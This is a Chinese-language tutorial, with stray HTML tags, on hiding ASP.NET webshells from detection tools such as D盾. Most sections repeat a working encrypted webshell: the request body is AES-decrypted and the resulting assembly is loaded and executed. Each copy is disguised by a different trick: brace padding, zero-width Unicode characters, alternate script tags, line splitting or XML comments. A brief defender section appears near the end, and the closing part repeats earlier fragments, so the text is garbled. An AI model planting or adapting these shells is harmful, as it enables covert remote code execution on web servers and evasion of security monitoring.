ASP.NET免杀技术详解<\/h1>

前言<\/h2>
本文详细解析了几种相对少见的ASP.NET免杀方法，这些技术可以用于绕过安全检测工具（如D盾）的检测机制。请注意，这些技术仅用于安全研究和防御目的，请勿用于非法用途。<\/p>

1. 花括号和分号混淆<\/h2>

在ASP.NET语法中，可以添加大量花括号{}<\/code>和分号;<\/code>作为混淆手段，这些不会影响代码的正常解析。<\/p>

示例代码<\/strong>：<\/p>

<% @page language=c# Import Namespace="System.Reflection"%><%Session.Add("k","e45e329feb5d925b");byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%>
<\/code><\/pre>
特点<\/strong>：<\/p>

在语法结束处添加大量{}<\/code>和;<\/code><\/li>
需要与其他免杀手法配合使用效果更佳<\/li>
<\/ul>
2. Unicode空白连接符<\/h2>
利用Unicode中的零宽连字字符(ZwJ)和零宽不折行空格字符来混淆关键代码。<\/p>
常用Unicode混淆字符<\/h3>



字符<\/th>
Unicode编码<\/th>
类型<\/th>
<\/tr>
<\/thead>


ZWJ<\/td>
\u200c, \u200d, \u200e, \u200f<\/td>
零宽连字<\/td>
<\/tr>

零宽空格<\/td>
\ufeff, \u202a, \u202b, \u202c, \u202d, \u202e<\/td>
零宽不折行空格<\/td>
<\/tr>
<\/tbody>
<\/table>
示例代码<\/strong>：<\/p>
<%@language = c#%><%@Import Namespace="System.Reflection"%><%Session.Add("k","e45e329feb5d925b"); byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.C\u202con\u202dtent\u202bLen\u202egth); Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%>
<\/code><\/pre>
特点<\/strong>：<\/p>

在关键函数名或参数名中插入零宽字符<\/li>
不影响代码执行但能干扰安全检测<\/li>
<\/ul>
3. 替代声明标签<\/h2>
除了常见的<% %><\/code>标签外，ASP.NET还支持其他形式的代码声明方式。<\/p>
3.1 语言声明变体<\/h3>

<% @language="C#" %><\/code> 可替换为 <% @language="Csharp" %><\/code><\/li>
某些安全设备可能只检测"C#"而不检测"Csharp"<\/li>
<\/ul>
3.2 script标签形式<\/h3>
标准形式<\/strong>：<\/p>
<% @language="C#" %><%Response.Write("hello world ashx");%>
<\/code><\/pre>
替代形式1<\/strong>：<\/p>
<script language=csharp runat=server>
void page_load(){
    Response.Write("hello world");
}
<\/script>
<\/code><\/pre>
替代形式2<\/strong>（结合免杀）：<\/p>
<script language=csharp runat=server>
void page_load(){
    Session.Add("k","e45e329feb5d925b"); 
    byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.C\u202con\u202dtent\u202bLen\u202egth); 
    System.Reflection.Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);
}
<\/script>
<\/code><\/pre>
特点<\/strong>：<\/p>

使用<script><\/code>标签替代<% %><\/code><\/li>
需要定义page_load<\/code>方法<\/li>
可与其他免杀技术结合<\/li>
<\/ul>
4. 换行特性<\/h2>
通过插入换行符来干扰安全检测工具的解析。<\/p>
示例<\/strong>：<\/p>
<% @language = c# %>
<%@Import Namespace="System.Reflection"%>
<%
Session.Add("k","e45e329feb5d925b"); 
byte[] k = Encoding.Default.GetBytes(Session[0] + ""),
c = Request.BinaryRead(Request.ContentLength); 
Assembly.Load(new System.Security.Cryptography.RijndaelManaged()
.CreateDecryptor(k, k)
.TransformFinalBlock(c, 0, c.Length))
.CreateInstance("U")
.Equals(this);
%>
<\/code><\/pre>
特点<\/strong>：<\/p>

将单行代码拆分为多行<\/li>
效果相对有限，需与其他技术配合<\/li>
<\/ul>
5. C#的\/\/\/特性和XML注释<\/h2>
利用C#的XML注释特性\/\/\/<\/code>进行混淆。<\/p>
有效示例<\/strong>：<\/p>
<%@language = c#%>
<%@Import Namespace="System.Reflection"%>
<%Session.Add("k","e45e329feb5d925b"); 
\/\/\/ 
byte[] k = Encoding.Default.GetBytes(Session[0] + ""),
\/\/\/ 
c = Request.BinaryRead(Request.ContentLength);
\/\/\/ 
Assembly.Load(new System.Security.Cryptography.RijndaelManaged()
.CreateDecryptor(k, k)
.TransformFinalBlock(c, 0, c.Length))
.CreateInstance("U")
.Equals(this);%>
<\/code><\/pre>
无效示例<\/strong>（使用\\<\/code>而非\/\/\/<\/code>）：<\/p>
<%@language = c#%>
<%@Import Namespace="System.Reflection"%>
<%Session.Add("k","e45e329feb5d925b"); 
byte[] k = Encoding.Default.GetBytes(Session[0] + ""),
c = Request.BinaryRead(Request.ContentLength); 
\\Assembly.Load(new System.Security.Cryptography.RijndaelManaged()
.CreateDecryptor(k, k)
.TransformFinalBlock(c, 0, c.Length))
.CreateInstance("U")
.Equals(this);%>
<\/code><\/pre>
特点<\/strong>：<\/p>

只能使用\/\/\/<\/code>作为XML注释<\/li>
\/\/<\/code>和\\<\/code>会导致语法错误<\/li>
注释需要与代码换行配合<\/li>
<\/ul>
综合应用建议<\/h2>

组合使用多种技术<\/strong>：单一技术可能效果有限，建议组合使用Unicode混淆、标签替换和注释等技术<\/li>
关键字替换<\/strong>：如将"C#"替换为"Csharp"<\/li>
代码结构变化<\/strong>：改变代码的组织方式，避免特征匹配<\/li>
测试验证<\/strong>：每次修改后需验证代码功能是否正常<\/li>
<\/ol>
防御建议<\/h2>
对于防御方，建议：<\/p>

监控和过滤Unicode零宽字符<\/li>
检测多种形式的语言声明<\/li>
关注<script runat=server><\/code>形式的代码块<\/li>
实现多层次的代码分析和语义分析，而非简单的特征匹配<\/li>
<\/ol>
总结<\/h2>
本文详细介绍了五种ASP.NET免杀技术，包括语法符号混淆、Unicode字符混淆、替代标签使用、换行拆分和注释利用。这些技术可以单独或组合使用，以绕过某些安全检测机制。安全研究人员应了解这些技术以更好地防御相关攻击。<\/p>

ASP.NET免杀技术详解<\/h1>

前言<\/h2> 本文详细解析了几种相对少见的ASP.NET免杀方法，这些技术可以用于绕过安全检测工具（如D盾）的检测机制。请注意，这些技术仅用于安全研究和防御目的，请勿用于非法用途。<\/p>

2. Unicode空白连接符<\/h2> 利用Unicode中的零宽连字字符(ZwJ)和零宽不折行空格字符来混淆关键代码。<\/p>

3. 替代声明标签<\/h2> 除了常见的<% %><\/code>标签外，ASP.NET还支持其他形式的代码声明方式。<\/p>

前言<\/h2>
本文详细解析了几种相对少见的ASP.NET免杀方法，这些技术可以用于绕过安全检测工具（如D盾）的检测机制。请注意，这些技术仅用于安全研究和防御目的，请勿用于非法用途。<\/p>

2. Unicode空白连接符<\/h2>
利用Unicode中的零宽连字字符(ZwJ)和零宽不折行空格字符来混淆关键代码。<\/p>

3. 替代声明标签<\/h2>
除了常见的`<% %><\/code>标签外，ASP.NET还支持其他形式的代码声明方式。<\/p>`